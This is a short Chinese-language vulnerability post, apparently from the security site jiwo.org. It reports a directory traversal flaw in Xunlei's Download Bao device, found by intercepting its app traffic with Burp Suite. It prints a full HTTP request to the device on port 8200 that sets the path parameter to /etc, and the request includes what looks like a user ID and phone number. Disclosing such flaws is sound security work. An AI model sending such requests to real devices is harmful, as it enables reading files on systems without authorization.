标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-16]   作者: ecawen 发表于: [2017-07-05]  [2023-01-02]被用户:ecawen 修改过

本文共 [453] 位读者顶过

将迅雷下载宝app安装到手机 使用burpsuit截获下载宝流量,经研究发现以下目录回溯遍历漏洞,如下:[出自:jiwo.org]


1.192.168.0.102:8200
GET /dlna.csp?fname=dlna&opt=querydir&path=/etc&type=&userid=173375202&username=13874589379 HTTP/1.1
Content-Type: application/json
Connection: close
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; SM-G9350 Build/MMB29M)
Host: 192.168.0.102:8200
Accept-Encoding: gzip

path=处,即可进行目录回溯。

评论

暂无
发表评论
 返回顶部 
热度(453)
 关注微信